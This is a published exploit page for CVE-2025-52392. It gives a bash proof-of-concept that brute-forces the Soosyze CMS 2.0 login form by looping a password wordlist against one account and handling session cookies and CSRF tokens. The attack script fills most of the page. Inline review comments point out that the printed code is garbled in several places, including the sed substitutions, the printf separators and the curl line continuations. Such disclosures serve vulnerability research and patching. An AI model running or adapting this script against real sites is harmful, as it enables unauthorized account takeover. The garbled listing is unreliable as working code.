
Soosyze CMS 2.0 – Brute Force Login

Categories: WebApps

Soosyze CMS 2.0 – Brute Force Login

Proof of Concept (PoC)

poc.sh
# Exploit Title: Soosyze CMS 2.0 - Brute Force Login
# Google Dork: N/A
# Date: 2025-08-13
# Exploit Author: Beatriz Fresno Naumova (beafn28)
# Vendor Homepage: https://soosyze.com/
# Software Link: https://github.com/soosyze/soosyze
# Version: 2.0 (tested)
# Tested on: macOS Sonoma 14.x (Apple Silicon M1), /bin/bash 3.2 & Homebrew bash 5.2, curl 8.x, BSD sed
# CVE : CVE-2025-52392

# Description:
# Soosyze CMS 2.0 allows brute-force login attacks via /user/login due to missing rate limiting
# and account lockout mechanisms. An attacker can submit unlimited POST requests with a known
# username/email and a password wordlist, potentially gaining unauthorized access (CWE-307).

# PoC Usage:
#   ./script.sh [wordlist.txt]
# If no wordlist is provided, the script's built-in list of default passwords (DEFAULT_WORDS) is used.

#!/usr/bin/env bash
# NOTE(review): on this page the shebang follows the comment header above, so
# it is not on line 1 and the kernel will not act on it; the strict-mode line
# below is what actually governs the run once bash is started explicitly.

set -euo pipefail

# Target and form parameters: a local instance, the login route, the two form
# field names and the account under test. All are hard-coded; only the
# wordlist path is taken from argv.
BASE_URL="http://localhost:8000"
LOGIN_PATH="/user/login"
EMAIL_FIELD="email"
PASS_FIELD="password"
TARGET_EMAIL="[email protected]"   # rendered obfuscated on this page, not a literal address

# Optional wordlist path; empty when no argument is given. DEFAULT_WORDS is the
# fallback the main loop uses when the path is missing or unreadable.
WORDLIST_FILE="${1:-}"
DEFAULT_WORDS=("123456" "admin" "password" "qwerty" "letmein" "admin123" "password1")

form_url="$BASE_URL$LOGIN_PATH"
# The cookie jar gets a proper mktemp name. The page and response bodies
# written by the functions below (/tmp/login_page.html, /tmp/resp.html) do
# not: they use fixed, predictable paths in shared /tmp.
COOKIE_JAR="$(mktemp)"

#######################################
# Fetch the login page so the session cookie (and any hidden form token the
# page carries) is available for the next POST.
# Globals:   COOKIE_JAR, form_url (read)
# Outputs:   writes the page HTML to the fixed path /tmp/login_page.html
# Returns:   curl's exit status; under set -e a failure aborts the script
#######################################
get_form() {
    # Fixed, world-shared path rather than mktemp: a pre-existing file or
    # symlink at this name in /tmp would simply be overwritten/followed, and
    # the file is never removed by the cleanup at the end of the script.
    curl -sS -c "$COOKIE_JAR" -b "$COOKIE_JAR" "$form_url" > /tmp/login_page.html
}

#######################################
# Locate the first hidden <input> in /tmp/login_page.html whose name contains
# "token" or "csrf", and print its name and value as one line for `read`.
# Globals:   none (reads /tmp/login_page.html written by get_form)
# Outputs:   name and value on stdout; both empty when nothing matches
# Returns:   0 — the `|| true` guards keep a failing sed|head pipeline (e.g.
#            sed hit by SIGPIPE after head exits under pipefail) from aborting
#######################################
extract_token() {
    local name value
    # NOTE(review): the sed replacement reads `/1/` and the printf format below
    # reads `'%st%sn'` on this page; both look garbled by the page's extraction
    # rather than intentional, and as printed the function emits neither a
    # back-reference nor a field separator. Treat this listing as illustrative.
    name=$(sed -nE 's/.*name="([_a-zA-Z0-9:-]*(token|csrf)[_a-zA-Z0-9:-]*)".*type="hidden".*/1/p' /tmp/login_page.html | head -n1 || true)
    value=""
    if [[ -n "$name" ]]; then
        # As printed, this nests unescaped double quotes inside a double-quoted
        # sed script, which is not valid shell quoting (same extraction damage).
        value=$(sed -nE "s/.*name="$name".*value="([^"]*)".*/1/p" /tmp/login_page.html | head -n1 || true)
    fi
    printf '%st%sn' "$name" "$value"
}

#######################################
# Submit one login attempt with the given password and optional hidden token.
# Arguments: $1 password, $2 token field name (may be empty), $3 token value
# Globals:   COOKIE_JAR, form_url, BASE_URL, EMAIL_FIELD, PASS_FIELD,
#            TARGET_EMAIL (read)
# Outputs:   the HTTP status code on stdout (curl -w); the response body goes
#            to the fixed path /tmp/resp.html
# Returns:   curl's exit status
#######################################
post_login() {
    local pass="$1" tname="$2" tval="$3"
    # NOTE(review): on this page the lines below appear as separate statements;
    # the continuation markers that would join them into one curl invocation
    # seem to have been lost in extraction, so as printed only the first line
    # is the curl call and the rest are not valid commands.
    # The final `$( … )` is an unquoted command substitution: when a token is
    # present its output is word-split on IFS, so a token name or value
    # containing whitespace would be broken into several arguments; when no
    # token is present it contributes no argument at all.
    curl -sS -o /tmp/resp.html -w "%{http_code}" 
        -c "$COOKIE_JAR" -b "$COOKIE_JAR" 
        -X POST "$form_url" 
        -H "Content-Type: application/x-www-form-urlencoded" 
        -H "Origin: $BASE_URL" -H "Referer: $form_url" 
        --data-urlencode "$EMAIL_FIELD=$TARGET_EMAIL" 
        --data-urlencode "$PASS_FIELD=$pass" 
        $( [[ -n "$tname" && -n "$tval" ]] && printf -- '--data-urlencode %s=%s' "$tname" "$tval" )
}

# Main loop: one form fetch and one POST per candidate password. This is the
# traffic shape the header's CWE-307 description refers to: repeated POSTs to
# /user/login for a single account, a few hundred milliseconds apart, which
# per-account lockout or per-source rate limiting on that route would stop
# and which shows up in logs as a run of failed logins for one email.
echo "[*] Starting brute-force attack on $form_url"
# Load candidates from the wordlist when it is readable, else use the defaults.
# NOTE(review): `mapfile` is a bash 4 builtin; under the /bin/bash 3.2 named
# in the header it is unavailable and the `||` branch silently falls back to
# DEFAULT_WORDS. A readable but empty wordlist leaves `words` unset, which
# `set -u` then rejects at the for loop below.
[[ -n "$WORDLIST_FILE" && -r "$WORDLIST_FILE" ]] && mapfile -t words < "$WORDLIST_FILE" || words=("${DEFAULT_WORDS[@]}")

i=0
for pw in "${words[@]}"; do
    i=$((i+1))
    # Re-fetch the form on every attempt so the cookie/token pair is fresh.
    get_form
    # NOTE(review): the IFS value is printed as $'t' here, matching the garbled
    # separator in extract_token; as printed the two fields are not split.
    IFS=$'t' read -r TOKEN_NAME TOKEN_VALUE < <(extract_token)
    code=$(post_login "$pw" "$TOKEN_NAME" "$TOKEN_VALUE")

    # Success heuristic: the response body contains the literal "redirect".
    # Anything else is reported as a miss regardless of the HTTP status.
    if grep -q '"redirect"' /tmp/resp.html; then
        # NOTE(review): the escape sequences in this echo -e are also garbled
        # on this page (bold on/off was presumably intended).
        echo -e "[$i] Password found: 'e[1m$pwe[0m' (HTTP $code)"
        break
    else
        echo "[$i] '$pw' (HTTP $code)"
    fi

    # Random pause of 0.1–0.9 s between attempts (RANDOM%9+1 is 1..9).
    sleep 0.$((RANDOM%9+1))
done

# Cleanup runs only on normal completion: there is no trap, so an abort
# (set -e, Ctrl-C) leaves the cookie jar and /tmp/resp.html behind, and
# /tmp/login_page.html is never removed at all.
rm -f "$COOKIE_JAR" /tmp/resp.html

Security Disclaimer

This exploit is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal and may result in severe legal consequences. Always ensure you have explicit permission before testing vulnerabilities.
